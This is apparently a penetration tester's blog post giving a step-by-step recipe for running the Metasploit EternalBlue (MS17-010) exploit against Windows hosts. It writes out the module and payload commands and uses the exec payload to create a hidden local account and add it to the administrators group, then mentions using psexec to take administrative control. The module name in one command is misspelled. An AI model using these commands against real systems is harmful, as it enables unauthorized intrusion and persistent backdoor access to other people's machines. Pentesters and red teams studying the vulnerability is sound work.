Ever since MS17-010 made headlines and the Metasploit exploit came out, it has been mostly good news for penetration testers and corporate red teams. I’m not going to cover the vulnerability or how it came about as that has been beat to death by hundreds of people since March. The purpose of this post is to share some tricks that I have used to get this exploit to be more reliable. For those not aware, you can view the metasploit exploit via Rapid7 at the following link.
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
Being a penetration tester, I’ve encountered numerous instances of the vulnerability across many different networks. From my experience, this is what I have found.
- Sometimes the exploit will work
- Sometimes the exploit will cause the machine to BSOD (blue screen of death)
- Sometimes the exploit will execute, but nothing will happen.
I have tried using both meterpreter and native bind and reverse shells, tcp, http, https, etc. It has been very flaky for me over the course of the last 5 or so months.
I have, however, found that using the following method/killchain to be the fastest and most reliable method to leverage this vulnerability and metasploit exploit. First, you are going to need to use the exploit. To do this, type
use exploit/windows/smb/ms17_010_eternablue
If this doesn’t work, chances are you need to update your metasploit instance. I usually just run an apt-get update && upgrade to get everything upgraded if that happens. The more the merrier!
Now, instead of using the default meterpreter/reverse_tcp payload, you are going to set your payload to something that is a little less popular and often overlooked. The exec payload. What this payload does is execute a command on the machine. This can be anything from a reverse shell via powershell, launchng the calculator, killing minesweeper…you get the drift.
set payload windows/x64/exec
What I use this payload for is to add a local administrator to the machine. This is a two part process. I know you can chain the command in Windows, however, I have found limited success in doing that. I use this as the first part of the command.
set cmd net user NewAdmin SuperDuperPass1 /add set rhost 192.168.1.1
Where:
- NewAdmin is the name of the new local administrative account we are adding to the machine.
- SuperDuperPass1 is the password to the new local admin account we are adding to the machine.
- RHOST is the machine being targeted
When you run this exploit, it will appear to fail (what metasploit tells you), however, you can try logging into the machine using msf login_scanner or other methods, and what you will often find is your new account has been added to the machine! Awesome. Now, all you have to do is re-run the exploit but use the following as the CMD argument.
set cmd net localgroup "administrators" NewAdmin /add
When you run this exploit, the account will be added to the local administrative group, which will allow you to use psexec to gain administrative access to the machine and get the goods!